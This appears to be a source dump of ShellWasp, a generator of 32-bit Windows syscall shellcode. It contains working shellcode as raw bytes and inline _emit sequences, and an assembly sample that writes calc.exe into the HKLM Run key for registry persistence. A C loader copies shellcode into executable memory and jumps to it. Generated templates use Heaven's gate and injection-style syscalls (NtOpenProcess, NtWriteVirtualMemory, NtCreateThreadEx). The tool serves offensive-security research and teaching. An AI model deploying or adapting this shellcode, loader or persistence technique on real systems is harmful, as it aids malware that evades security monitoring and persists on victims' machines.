breakpoint - remove if outside of debugger ; This is the stage two payload. The _emit keyword is how you can create those in inline Assembly for Visual Studio. In traditional shellcode, we would present this in a different way. The stage two payload is just a simple POC messagebox, but it could be exchanged for anything. There are other ways of doing this in inline ASsembly, but I prefer this way, as it is closer to actual shellcode. ourShell: _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x31 _emit 0xc9 _emit 0xf7 _emit 0xe1 _emit 0x64 _emit 0x8b _emit 0x41 _emit 0x30 _emit 0x8b _emit 0x40 _emit 0x0c _emit 0x8b _emit 0x70 _emit 0x14 _emit 0xad _emit 0x96 _emit 0xad _emit 0x8b _emit 0x58 _emit 0x10 _emit 0x8b _emit 0x53 _emit 0x3c _emit 0x01 _emit 0xda _emit 0x8b _emit 0x52 _emit 0x78 _emit 0x01 _emit 0xda _emit 0x8b _emit 0x72 _emit 0x20 _emit 0x01 _emit 0xde _emit 0x31 _emit 0xc9 _emit 0x41 _emit 0xad _emit 0x01 _emit 0xd8 _emit 0x81 _emit 0x38 _emit 0x47 _emit 0x65 _emit 0x74 _emit 0x50 _emit 0x75 _emit 0xf4 _emit 0x81 _emit 0x78 _emit 0x04 _emit 0x72 _emit 0x6f _emit 0x63 _emit 0x41 _emit 0x75 _emit 0xeb _emit 0x81 _emit 0x78 _emit 0x08 _emit 0x64 _emit 0x64 _emit 0x72 _emit 0x65 _emit 0x75 _emit 0xe2 _emit 0x8b _emit 0x72 _emit 0x24 _emit 0x01 _emit 0xde _emit 0x66 _emit 0x8b _emit 0x0c _emit 0x4e _emit 0x49 _emit 0x8b _emit 0x72 _emit 0x1c _emit 0x01 _emit 0xde _emit 0x8b _emit 0x14 _emit 0x8e _emit 0x01 _emit 0xda _emit 0x89 _emit 0xd5 _emit 0x31 _emit 0xc9 _emit 0x51 _emit 0x68 _emit 0x61 _emit 0x72 _emit 0x79 _emit 0x41 _emit 0x68 _emit 0x4c _emit 0x69 _emit 0x62 _emit 0x72 _emit 0x68 _emit 0x4c _emit 0x6f _emit 0x61 _emit 0x64 _emit 0x54 _emit 0x53 _emit 0xff _emit 0xd2 _emit 0x68 _emit 0x6c _emit 0x6c _emit 0x61 _emit 0x61 _emit 0x66 _emit 0x81 _emit 0x6c _emit 0x24 _emit 0x02 _emit 0x61 _emit 0x61 _emit 0x68 _emit 0x33 _emit 0x32 _emit 0x2e _emit 0x64 _emit 0x68 _emit 0x55 _emit 0x73 _emit 0x65 _emit 0x72 _emit 0x54 _emit 0xff _emit 0xd0 _emit 0x68 _emit 0x6f _emit 0x78 _emit 0x41 _emit 0x61 _emit 0x66 _emit 0x83 _emit 0x6c _emit 0x24 _emit 0x03 _emit 0x61 _emit 0x68 _emit 0x61 _emit 0x67 _emit 0x65 _emit 0x42 _emit 0x68 _emit 0x4d _emit 0x65 _emit 0x73 _emit 0x73 _emit 0x54 _emit 0x50 _emit 0xff _emit 0xd5 _emit 0x83 _emit 0xc4 _emit 0x10 _emit 0x31 _emit 0xd2 _emit 0x31 _emit 0xc9 _emit 0x52 _emit 0x68 _emit 0x50 _emit 0x77 _emit 0x6e _emit 0x64 _emit 0x89 _emit 0xe7 _emit 0x52 _emit 0x68 _emit 0x59 _emit 0x65 _emit 0x73 _emit 0x73 _emit 0x89 _emit 0xe1 _emit 0x52 _emit 0x57 _emit 0x51 _emit 0x52 _emit 0xff _emit 0xd0 _emit 0x83 _emit 0xc4 _emit 0x10 _emit 0x68 _emit 0x65 _emit 0x73 _emit 0x73 _emit 0x61 _emit 0x66 _emit 0x83 _emit 0x6c _emit 0x24 _emit 0x03 _emit 0x61 _emit 0x68 _emit 0x50 _emit 0x72 _emit 0x6f _emit 0x63 _emit 0x68 _emit 0x45 _emit 0x78 _emit 0x69 _emit 0x74 _emit 0x54 _emit 0x53 _emit 0xff _emit 0xd5 _emit 0x31 _emit 0xc9 _emit 0x51 _emit 0xff _emit 0xd0 end2: nop } return 0; } ================================================ FILE: Samples/alternative_create_process.asm ================================================ ; Author: Shelby VandenHoek (VERONA Labs) ; This was made to highlight the ShellWasp technique for syscall shellcode. Note - Shelby used a slightly earlier ; version of ShellWasp, which has since changed. His shellcode still works on Win 7, 10, and 11. ; This is a way to create persistence via registry - in this case, for calculator! ; This is a total reworking/reimaging of an original 2005 syscall shellcode by P. Bania. The way of invoking the ; syscall then is obsolete now, so I told Shelby (then my employee and student) to recreate it from scratch using the ; ShellWasp technique. I had searched long and hard for any syscall shellcode that was non-Egghunter in nature, and Bania's ; was the only one that I could find. The original had used hardcoded syscall values - clearly a practice we ; would avoid today. ; Original: http://piotrbania.com/all/articles/windows_syscall_shellcode.pdf [bits 32] mov ebx,DWORD [fs:0x30] mov ebx, dword [ebx+0xac] mov ecx, esp sub esp, 0x1000 cmp bl, 0x64 ; 21H2, Win10 release jl less1 push 0x7002c ; NtTerminateProcess push 0x3000f ; NtClose push 0x60 ; NtSetValueKey push 0x1d ; NtCreateKey jmp saveSyscallArray less1: cmp bl, 0x63 ; 21h1, Win10 release jl less2 push 0x7002c ; NtTerminateProcess push 0x3000f ; NtClose push 0x60 ; NtSetValueKey push 0x1d ; NtCreateKey jmp saveSyscallArray less2: cmp bl, 0x62 ; 20H2, Win10 release jl less3 push 0x2c ; NtTerminateProcess push 0xf ; NtClose push 0x60 ; NtSetValueKey push 0x1d ; NtCreateKey jmp saveSyscallArray less3: cmp bl, 0xF0 ; 21H2, Win11 release jl less4 push 0x7002c ; NtTerminateProcess push 0x3003f ; NtClose push 0x60 ; NtSetValueKey push 0x1d ; NtCreateKey jmp saveSyscallArray less4: cmp bl, 0x61 ; 2004, Win10 release jl less5 push 0x2c ; NtTerminateProcess push 0xf ; NtClose push 0x60 ; NtSetValueKey push 0x1d ; NtCreateKey jmp saveSyscallArray less5: cmp bl, 0xBB ; 1909, Win10 release jl less6 push 0x2c ; NtTerminateProcess push 0xf ; NtClose push 0x60 ; NtSetValueKey push 0x1d ; NtCreateKey jmp saveSyscallArray less6: cmp bl, 0xBA ; 1903, Win10 release jl less7 push 0x2c ; NtTerminateProcess push 0xf ; NtClose push 0x60 ; NtSetValueKey push 0x1d ; NtCreateKey jmp saveSyscallArray less7: cmp bl, 0xB1 ; Win7, Sp1 release jl end push 0x29 ; NtTerminateProcess push 0xc ; NtClose push 0x5d ; NtSetValueKey push 0x1a ; NtCreateKey saveSyscallArray: mov edi, esp mov esp, ecx sub esp, 0x400 ; Storage for Params ; Length without NULL: 0x7e ; Length with NULL: 0x80 ; UTF-16: \Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run xor edx, edx push edx mov dl, 0x6e push dx mov dl, 0x75 push dx mov dl, 0x52 push dx mov dl, 0x5c push dx mov dl, 0x6e push dx mov dl, 0x6f push dx mov dl, 0x69 push dx mov dl, 0x73 push dx mov dl, 0x72 push dx mov dl, 0x65 push dx mov dl, 0x56 push dx mov dl, 0x74 push dx mov dl, 0x6e push dx mov dl, 0x65 push dx mov dl, 0x72 push dx mov dl, 0x72 push dx mov dl, 0x75 push dx mov dl, 0x43 push dx mov dl, 0x5c push dx mov dl, 0x73 push dx mov dl, 0x77 push dx mov dl, 0x6f push dx mov dl, 0x64 push dx mov dl, 0x6e push dx mov dl, 0x69 push dx mov dl, 0x57 push dx mov dl, 0x5c push dx mov dl, 0x74 push dx mov dl, 0x66 push dx mov dl, 0x6f push dx mov dl, 0x73 push dx mov dl, 0x6f push dx mov dl, 0x72 push dx mov dl, 0x63 push dx mov dl, 0x69 push dx mov dl, 0x4d push dx mov dl, 0x5c push dx mov dl, 0x65 push dx mov dl, 0x72 push dx mov dl, 0x61 push dx mov dl, 0x77 push dx mov dl, 0x74 push dx mov dl, 0x66 push dx mov dl, 0x6f push dx mov dl, 0x53 push dx mov dl, 0x5c push dx mov dl, 0x65 push dx mov dl, 0x6e push dx mov dl, 0x69 push dx mov dl, 0x68 push dx mov dl, 0x63 push dx mov dl, 0x61 push dx mov dl, 0x4d push dx mov dl, 0x5c push dx mov dl, 0x79 push dx mov dl, 0x72 push dx mov dl, 0x74 push dx mov dl, 0x73 push dx mov dl, 0x69 push dx mov dl, 0x67 push dx mov dl, 0x65 push dx mov dl, 0x52 push dx mov dl, 0x5c push dx mov [ebp-4], esp ; REG_PATH ; Length without NULL: 0x38 ; Length with NULL: 0x3a ; UTF-16: c:\Windows\System32\calc.exe xor edx, edx push edx mov dl, 0x65 push dx mov dl, 0x78 push dx mov dl, 0x65 push dx mov dl, 0x2e push dx mov dl, 0x63 push dx mov dl, 0x6c push dx mov dl, 0x61 push dx mov dl, 0x63 push dx mov dl, 0x5c push dx mov dl, 0x32 push dx mov dl, 0x33 push dx mov dl, 0x6d push dx mov dl, 0x65 push dx mov dl, 0x74 push dx mov dl, 0x73 push dx mov dl, 0x79 push dx mov dl, 0x53 push dx mov dl, 0x5c push dx mov dl, 0x73 push dx mov dl, 0x77 push dx mov dl, 0x6f push dx mov dl, 0x64 push dx mov dl, 0x6e push dx mov dl, 0x69 push dx mov dl, 0x57 push dx mov dl, 0x5c push dx mov dl, 0x3a push dx mov dl, 0x43 push dx mov [ebp-8], esp ; CALC_PATH ; Length without NULL: 0x26 ; Length with NULL: 0x28 ; UTF-16: Syscall Created Key xor edx, edx push edx mov dl, 0x79 push dx mov dl, 0x65 push dx mov dl, 0x4b push dx mov dl, 0x20 push dx mov dl, 0x64 push dx mov dl, 0x65 push dx mov dl, 0x74 push dx mov dl, 0x61 push dx mov dl, 0x65 push dx mov dl, 0x72 push dx mov dl, 0x43 push dx mov dl, 0x20 push dx mov dl, 0x6c push dx mov dl, 0x6c push dx mov dl, 0x61 push dx mov dl, 0x63 push dx mov dl, 0x73 push dx mov dl, 0x79 push dx mov dl, 0x53 push dx mov [ebp-12], esp ; VALUE_NAME ; UNICODE_STRING ValueName xor edx, edx push dword [ebp-12] ; Buffer mov dx, 0x28 push dx ; Max Length mov dx, 0x26 push dx ; Length mov [ebp-16], esp ; US_VALUE_NAME ; UNICODE_STRING REG_PATH xor edx, edx push dword [ebp-4] ; Buffer mov dx, 0x80 push dx ; Max Length mov dx, 0x7E push dx ; Length mov [ebp-20], esp ; US_REG_PATH ; _OBJECT_ATTRIBUTES xor edx, edx xor ecx, ecx push edx ; SecurityQualityOfService = NULL push edx ; SecurityDescriptor = NULL inc ecx shl ecx, 6 push ecx ; Attributes = OBJ_CASE_INSENSITIVE = 0x40 push dword [ebp-20] ; US_REG_PATH push edx ; Root Directory = NULL push 0x18 ; Length mov [ebp-24], esp ; OBJECT_ATTR ; KeyHandle xor edx, edx push edx mov [ebp-28], esp ; PKEY_HANDLE ; Access Mask: ; KEY_ALL_ACCESS = 0xF003F ; Will Use Virtual Registry ; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ; xor ecx, ecx ; inc ecx ; 0x1 ; shl ecx, 4 ; 0x10 ; mov edx, ecx ; dec ecx ; 0xF ; shl ecx, 16 ; 0xF0000 ; shl edx, 2 ; 0x40 ; dec edx ; 0x3F ; add ecx, edx ; 0xF0000 + 0x3F = 0xF003F ; mov [ebp-32], ecx ; ACCESS_MASK ; KEY_ALL_ACCESS | KEY_WOW64_64KEY = 0xF013F ; Will Use Normal Registry ; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xor ecx, ecx inc ecx ; 0x1 shl ecx, 4 ; 0x10 mov edx, ecx dec ecx ; 0xF shl ecx, 16 ; 0xF0000 shl edx, 2 ; 0x40 dec edx ; 0x3F add ecx, edx ; 0xF0000 + 0x3F = 0xF003F xor edx, edx inc edx ; 0x1 shl edx, 8 ; 0x100 add ecx, edx ; 0xF003F + 0x100 = 0xF013F mov [ebp-32], ecx ; KEY_SET_VALUE = 0x2 ; Will Use Virtual Registry ; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ; xor ecx, ecx ; inc ecx ; 0x1 ; inc ecx ; 0x2 ; mov [ebp-32], ecx ; ACCESS_MASK ; KEY_SET_VALUE | KEY_WOW64_64KEY = 0x102 ; Will Use Normal Registry ; Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ; xor ecx, ecx ; inc ecx ; 0x1 ; shl ecx, 8 ; 0x100 ; inc ecx ; 0x101 ; inc ecx ; 0x102 ; mov [ebp-32], ecx ; ACCESS_MASK NtCreateKey: push edi ; Save Syscall Array xor edx, edx push edx ; KEY_DISPOSITION = NULL push edx ; Create Options REG_OPTION_NON_VOLATILE = 0x0 push edx ; Class = NULL push edx ; TitleIndex = 0x0 push dword [ebp-24] ; OBJECT_ATTR push dword [ebp-32] ; ACCESS_MASK push dword [ebp-28] ; PKEY_HANDLE mov eax, [edi] call syscallFunc add esp, 28 pop edi ; Get Syscall Array xor ecx, ecx cmp eax, ecx jne NtTerminateProcess RegSetValueKey: push edi ; Save Syscall Array xor edx, edx push 0x38 push dword [ebp-8] ; CALC_PATH inc edx push edx ; Type: REG_SZ = 0x1 dec edx push edx ; Title Index = 0x0 push dword [ebp-16] ; US_VALUE_NAME mov eax, [ebp-28] ; PKEY_HANDLE push dword [eax] mov eax, [edi+4] call syscallFunc add esp, 24 pop edi ; Get Syscall Array NtClose: push edi ; Save Syscall Array mov eax, [ebp-28] ; PKEY_HANDLE push dword [eax] mov eax, [edi+8] call syscallFunc add esp, 4 pop edi ; Get Syscall Array NtTerminateProcess: push edi ; Save Syscall Array xor edx, edx push edx push edx mov eax, [edi+12] call syscallFunc add esp, 8 jmp skipSyscall syscallFunc: mov ebx,DWORD [fs:0x30] mov ebx, [ebx+0xa4] ; OS Major Version cmp bl, 10 jne win7 win10: call [fs:0xc0] ret win7: xor ecx, ecx lea edx, [esp+4] call [fs:0xc0] add esp, 4 ret skipSyscall: end: ================================================ FILE: Samples/alternative_create_process_SHAREM_output.txt ================================================ Output from SHAREM: https://github.com/Bw3ll/sharem [*] Emulating x86 shellcode [*] CPU counter: 358 [*] Emulation complete ************* APIs ************* ************* Syscalls ************* 0x1200034b NtCreateKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULO G TitleIndex, PUNICODE_STRING Class, ULONG CreateOptions, PUNLONG Disposition) PHANDLE KeyHandle: 0x16fffae8 -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run ACCESS_MASK DesiredAccess: 0xf013f POBJECT_ATTRIBUTES ObjectAttributes: ULONG Length: 0x18 HANDLE RootDirectory: 0x0 PUNICODE_STRING ObjectName: \Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run ULONG Attributes: OBJ_CASE_INSENSITIVE PVOID SecurityDescriptor: 0x0 -> 0x0 PVOID SecurityQualityOfService: 0x0 -> 0x0 ULONG TitleIndex: 0x0 PUNICODE_STRING Class: 0x0 ULONG CreateOptions: 0x0 PUNLONG Disposition: 0x0 Return: NTSTATUS STATUS_SUCCESS EAX: 0x1d - (Windows 10, SP 21H1) 0x1200034b NtSetValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName, ULONG TitleIndex, ULONG Type, PVOID Dat , ULONG DataSize) HANDLE KeyHandle: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run PUNICODE_STRING ValueName: 385874700 ULONG TitleIndex: 0x0 ULONG Type: 0x1 PVOID Data: C:\Windows\System32\calc.exe ULONG DataSize: 0x38 Return: NTSTATUS STATUS_SUCCESS EAX: 0x60 - (Windows 10, SP 21H1) 0x1200034b NtClose(HANDLE Handle) HANDLE Handle: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Return: NTSTATUS STATUS_SUCCESS EAX: 0x3000f - (Windows 10, SP 21H1) 0x1200034b NtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus) HANDLE ProcessHandle: 0x0 NTSTATUS ExitStatus: STATUS_SUCCESS Return: NTSTATUS STATUS_SUCCESS EAX: 0x7002c - (Windows 10, SP 21H1) ************* DLLs ************* DLLs None ************* Artifacts ************* *** Paths *** ** Misc ** C:\Windows\System32\calc.exe \\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\Run *** Files *** ** Misc ** calc.exe *** EXE / DLLs *** C:\Windows\System32\calc.exe *** Registry Actions *** ** Add ** HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run ** Edit ** HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Syscall Created Key C:\Windows\System32\calc.exe *** Registry Techniques *** ** Persistence ** HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run *** Registry Hierarchy *** ** HKEY_Local_Machine ** HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run *** Registry Miscellaneous *** Software\\Microsoft\\Windows\\CurrentVersion\\Run ================================================ FILE: Samples/alternative_create_process_tester.c ================================================ // ; Author: Shelby VandenHoek (VERONA Labs) // ; This was made to highlight the ShellWasp technique for syscall shellcode. Note - Shelby used a slightly earlier // ; version of ShellWasp, which has since changed. His shellcode still works on Win 7, 10, and 11. // ; This is a way to create persistence via registry - in this case, for calculator! // ; This is a total reworking/reimaging of an original 2005 syscall shellcode by P. Bania. The way of invoking the // ; syscall then is obsolete now, so I told Shelby (then my employee and student) to recreate it from scratch using the // ; ShellWasp technique. I had searched long and hard for any syscall shellcode that was non-Egghunter in nature, and Bania's // ; was the only one that I could find. The original had used hardcoded syscall values - clearly a practice we // ; would avoid today. // ; Original from 2005: http://piotrbania.com/all/articles/windows_syscall_shellcode.pdf // ; This is intended to a script to test the shellcode - automatically generated by SHAREM (shellcode analysis // ; framework) from the binary file. The .ASM is available separately. This program must be debugged to work // ; as it has an int 3 breakpoint in it. #include #include char shellcode[] = "\x64\x8b\x1d\x30\x00\x00\x00\x8b\x9b\xac\x00\x00\x00\x89\xe1\x81\xec\x00\x10\x00\x00\x80\xfb\x64\x7c\x10\x68\x2c\x00\x07\x00\x68\x0f\x00\x03\x00\x6a\x60\x6a\x1d\xeb\x77\x80\xfb\x63\x7c\x10\x68\x2c\x00\x07\x00\x68\x0f\x00\x03\x00\x6a\x60\x6a\x1d\xeb\x62\x80\xfb\x62\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x53\x80\xfb\xf0\x7c\x10\x68\x2c\x00\x07\x00\x68\x3f\x00\x03\x00\x6a\x60\x6a\x1d\xeb\x3e\x80\xfb\x61\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x2f\x80\xfb\xbb\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x20\x80\xfb\xba\x7c\x0a\x6a\x2c\x6a\x0f\x6a\x60\x6a\x1d\xeb\x11\x80\xfb\xb1\x0f\x8c\xcb\x02\x00\x00\x6a\x29\x6a\x0c\x6a\x5d\x6a\x1a\x89\xe7\x89\xcc\x81\xec\x00\x04\x00\x00\x31\xd2\x52\xb2\x6e\x66\x52\xb2\x75\x66\x52\xb2\x52\x66\x52\xb2\x5c\x66\x52\xb2\x6e\x66\x52\xb2\x6f\x66\x52\xb2\x69\x66\x52\xb2\x73\x66\x52\xb2\x72\x66\x52\xb2\x65\x66\x52\xb2\x56\x66\x52\xb2\x74\x66\x52\xb2\x6e\x66\x52\xb2\x65\x66\x52\xb2\x72\x66\x52\xb2\x72\x66\x52\xb2\x75\x66\x52\xb2\x43\x66\x52\xb2\x5c\x66\x52\xb2\x73\x66\x52\xb2\x77\x66\x52\xb2\x6f\x66\x52\xb2\x64\x66\x52\xb2\x6e\x66\x52\xb2\x69\x66\x52\xb2\x57\x66\x52\xb2\x5c\x66\x52\xb2\x74\x66\x52\xb2\x66\x66\x52\xb2\x6f\x66\x52\xb2\x73\x66\x52\xb2\x6f\x66\x52\xb2\x72\x66\x52\xb2\x63\x66\x52\xb2\x69\x66\x52\xb2\x4d\x66\x52\xb2\x5c\x66\x52\xb2\x65\x66\x52\xb2\x72\x66\x52\xb2\x61\x66\x52\xb2\x77\x66\x52\xb2\x74\x66\x52\xb2\x66\x66\x52\xb2\x6f\x66\x52\xb2\x53\x66\x52\xb2\x5c\x66\x52\xb2\x65\x66\x52\xb2\x6e\x66\x52\xb2\x69\x66\x52\xb2\x68\x66\x52\xb2\x63\x66\x52\xb2\x61\x66\x52\xb2\x4d\x66\x52\xb2\x5c\x66\x52\xb2\x79\x66\x52\xb2\x72\x66\x52\xb2\x74\x66\x52\xb2\x73\x66\x52\xb2\x69\x66\x52\xb2\x67\x66\x52\xb2\x65\x66\x52\xb2\x52\x66\x52\xb2\x5c\x66\x52\x89\x65\xfc\x31\xd2\x52\xb2\x65\x66\x52\xb2\x78\x66\x52\xb2\x65\x66\x52\xb2\x2e\x66\x52\xb2\x63\x66\x52\xb2\x6c\x66\x52\xb2\x61\x66\x52\xb2\x63\x66\x52\xb2\x5c\x66\x52\xb2\x32\x66\x52\xb2\x33\x66\x52\xb2\x6d\x66\x52\xb2\x65\x66\x52\xb2\x74\x66\x52\xb2\x73\x66\x52\xb2\x79\x66\x52\xb2\x53\x66\x52\xb2\x5c\x66\x52\xb2\x73\x66\x52\xb2\x77\x66\x52\xb2\x6f\x66\x52\xb2\x64\x66\x52\xb2\x6e\x66\x52\xb2\x69\x66\x52\xb2\x57\x66\x52\xb2\x5c\x66\x52\xb2\x3a\x66\x52\xb2\x43\x66\x52\x89\x65\xf8\x31\xd2\x52\xb2\x79\x66\x52\xb2\x65\x66\x52\xb2\x4b\x66\x52\xb2\x20\x66\x52\xb2\x64\x66\x52\xb2\x65\x66\x52\xb2\x74\x66\x52\xb2\x61\x66\x52\xb2\x65\x66\x52\xb2\x72\x66\x52\xb2\x43\x66\x52\xb2\x20\x66\x52\xb2\x6c\x66\x52\xb2\x6c\x66\x52\xb2\x61\x66\x52\xb2\x63\x66\x52\xb2\x73\x66\x52\xb2\x79\x66\x52\xb2\x53\x66\x52\x89\x65\xf4\x31\xd2\xff\x75\xf4\x66\xba\x28\x00\x66\x52\x66\xba\x26\x00\x66\x52\x89\x65\xf0\x31\xd2\xff\x75\xfc\x66\xba\x80\x00\x66\x52\x66\xba\x7e\x00\x66\x52\x89\x65\xec\x31\xd2\x31\xc9\x52\x52\x41\xc1\xe1\x06\x51\xff\x75\xec\x52\x6a\x18\x89\x65\xe8\x31\xd2\x52\x89\x65\xe4\x31\xc9\x41\xc1\xe1\x04\x89\xca\x49\xc1\xe1\x10\xc1\xe2\x02\x4a\x01\xd1\x31\xd2\x42\xc1\xe2\x08\x01\xd1\x89\x4d\xe0\x57\x31\xd2\x52\x52\x52\x52\xff\x75\xe8\xff\x75\xe0\xff\x75\xe4\x8b\x07\xe8\x4e\x00\x00\x00\x83\xc4\x1c\x5f\x31\xc9\x39\xc8\x75\x32\x57\x31\xd2\x6a\x38\xff\x75\xf8\x42\x52\x4a\x52\xff\x75\xf0\x8b\x45\xe4\xff\x30\x8b\x47\x04\xe8\x28\x00\x00\x00\x83\xc4\x18\x5f\x57\x8b\x45\xe4\xff\x30\x8b\x47\x08\xe8\x16\x00\x00\x00\x83\xc4\x04\x5f\x57\x31\xd2\x52\x52\x8b\x47\x0c\xe8\x05\x00\x00\x00\x83\xc4\x08\xeb\x2b\x64\x8b\x1d\x30\x00\x00\x00\x8b\x9b\xa4\x00\x00\x00\x80\xfb\x0a\x75\x08\x64\xff\x15\xc0\x00\x00\x00\xc3\x31\xc9\x8d\x54\x24\x04\x64\xff\x15\xc0\x00\x00\x00\x83\xc4\x04\xc3"; int main(int argc, char **argv) { HINSTANCE hInstLib = LoadLibrary(TEXT("user32.dll")); int i = 0, len = 0, target_addy = 0, offset = 0; void*stage = VirtualAlloc(0, 3475, 0x1000,0x40 ); printf("[*] Memory allocated: 0x%08x\n", stage); len = sizeof(shellcode); printf("[*] Size of Shellcode: %08x\n", len); memmove(stage, shellcode, 3475); printf("[*] Shellcode copied\n"); target_addy = (char*)stage + 0; printf("[*] Adjusting offset: 0x%08x\n", target_addy); __asm { int 3 mov eax, target_addy jmp eax } } ================================================ FILE: setup.py ================================================ from setuptools import setup, find_packages import os import re NAME = "ShellWasp" VERSION = "1.0.1" REQUIREMENTS = [ "colorama>=0.4.4", "keystone-engine>=0.9.2", ] setup( name='ShellWasp: 32-bit Syscall Shellcode Generator', author='Bramwell Brizendine', description='ShellWasp - Generating 32-bit, WoW64 shellcode with Windows Syscalls', version=VERSION, long_description="Words", url='https://github.com/', include_package_data=True, packages=find_packages(), install_requires=REQUIREMENTS, classifiers=[ "Programming Language :: Python :: 3", ], python_requires='>=3.6', ) ================================================ FILE: shellWasp.py ================================================ import start.shellWasp from start.shellWasp import * if __name__ == "__main__": print ("hi. i am an evil wasp.\n") syscallMain() ================================================ FILE: start/Syscall Output/Win1011_NtAllocateVirtualMemory_NtQuerySystemInformation_NtOpenProcess_20230414_143422.txt ================================================ call GetPC1 GetPC1: add [esp], 5 retf ; Invoke Heaven's gate -- go x64 db 0x41,0x8b,0x1c,0x24 ; x64: mov ebx,dword ptr [r12] push 0x23 call GetPC2 GetPC2: mov [esp+4], 0x23 add [esp], 0xa retf ; Invoke Heaven's gate -- go x86 mov ebx, [ebx+0x30] mov ebx, [ebx+0xac] mov ecx, esp sub esp, 0x1000 cmp bl, 0xF0 ; 21h2, Win11 release jl end push 0x18 ; NtAllocateVirtualMemory push 0x36 ; NtQuerySystemInformation push 0x26 ; NtOpenProcess push 0x55 ; NtCreateFile push 0x4a ; NtCreateSection push 0x28 ; NtMapViewOfSection push 0x50 ; NtProtectVirtualMemory push 0x3a ; NtWriteVirtualMemory push 0xc5 ; NtCreateThreadEx push 0xd0004 ; NtWaitForSingleObject saveSyscallArray: mov edi, esp mov esp, ecx push edi push 0x00000000 ; ULONG Protect push 0x00000000 ; ULONG AllocationType push 0x00000000 ; PSIZE_T RegionSize push 0x00000000 ; ULONG_PTR ZeroBits push 0x00000000 ; PVOID *BaseAddress push 0x00000000 ; HANDLE ProcessHandle mov eax, [edi+0x24] ; NtAllocateVirtualMemory syscall call ourSyscall mov edi, [esp+0x18] push edi push 0x00000000 ; PULONG ReturnLength push 0x00000000 ; ULONG SystemInformationLength push 0x00000000 ; PVOID SystemInformation push 0x00000000 ; SYSTEM_INFORMATION_CLASS SystemInformationClass mov eax, [edi+0x20] ; NtQuerySystemInformation syscall call ourSyscall mov edi, [esp+0x10] push edi push 0x00000000 ; PCLIENT_ID ClientId push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes push 0x00000000 ; ACCESS_MASK AccessMask push 0x00000000 ; PHANDLE ProcessHandle mov eax, [edi+0x1c] ; NtOpenProcess syscall call ourSyscall mov edi, [esp+0x10] push edi push 0x00000000 ; ULONG EaLength push 0x00000000 ; PVOID EaBuffer push 0x00000000 ; ULONG CreateOptions push 0x00000000 ; ULONG CreateDisposition push 0x00000000 ; ULONG ShareAccess push 0x00000000 ; ULONG FileAttributes push 0x00000000 ; PLARGE_INTEGER AllocationSize push 0x00000000 ; PIO_STATUS_BLOCK IoStatusBlock push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes push 0x00000000 ; ACCESS_MASK DesiredAccess push 0x00000000 ; PHANDLE FileHandle mov eax, [edi+0x18] ; NtCreateFile syscall call ourSyscall mov edi, [esp+0x2c] push edi push 0x00000000 ; HANDLE FileHandle push 0x00000000 ; ULONG AllocationAttributes push 0x00000000 ; ULONG SectionPageProtection push 0x00000000 ; PLARGE_INTEGER MaximumSize push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes push 0x00000000 ; ACCESS_MASK DesiredAccess push 0x00000000 ; PHANDLE SectionHandle mov eax, [edi+0x14] ; NtCreateSection syscall call ourSyscall mov edi, [esp+0x1c] push edi push 0x00000000 ; ULONG Protect push 0x00000000 ; ULONG AllocationType push 0x00000000 ; DWORD InheritDisposition push 0x00000000 ; PULONG ViewSize push 0x00000000 ; PLARGE_INTEGER SectionOffset push 0x00000000 ; ULONG CommitSize push 0x00000000 ; ULONG ZeroBits push 0x00000000 ; PVOID *BaseAddress push 0x00000000 ; HANDLE ProcessHandle push 0x00000000 ; HANDLE SectionHandle mov eax, [edi+0x10] ; NtMapViewOfSection syscall call ourSyscall mov edi, [esp+0x28] push edi push 0x00000000 ; PULONG OldAccessProtection push 0x00000000 ; ULONG NewAccessProtection push 0x00000000 ; PULONG NumberOfBytesToProtect push 0x00000000 ; PVOID *BaseAddress push 0x00000000 ; HANDLE ProcessHandle mov eax, [edi+0xc] ; NtProtectVirtualMemory syscall call ourSyscall mov edi, [esp+0x14] push edi push 0x00000000 ; PULONG NumberOfBytesWritten push 0x00000000 ; ULONG NumberOfBytesToWrite push 0x00000000 ; PVOID Buffer push 0x00000000 ; PVOID BaseAddress push 0x00000000 ; HANDLE ProcessHandle mov eax, [edi+0x8] ; NtWriteVirtualMemory syscall call ourSyscall mov edi, [esp+0x14] push edi push 0x00000000 ; PVOID AttributeList push 0x00000000 ; ULONG MaximumStackSize push 0x00000000 ; ULONG StackSize push 0x00000000 ; ULONG ZeroBits push 0x00000000 ; ULONG CreateFlags push 0x00000000 ; PVOID Argument push 0x00000000 ; PVOID StartR__OUTine push 0x00000000 ; HANDLE ProcessHandle push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes push 0x00000000 ; ACCESS_MASK DesiredAccess push 0x00000000 ; PHANDLE ThreadHandle mov eax, [edi+0x4] ; NtCreateThreadEx syscall call ourSyscall mov edi, [esp+0x2c] push edi push 0x00000000 ; PLARGE_INTEGER TimeOut push 0x00000000 ; BOOLEAN Alertable push 0x00000000 ; HANDLE ObjectHandle 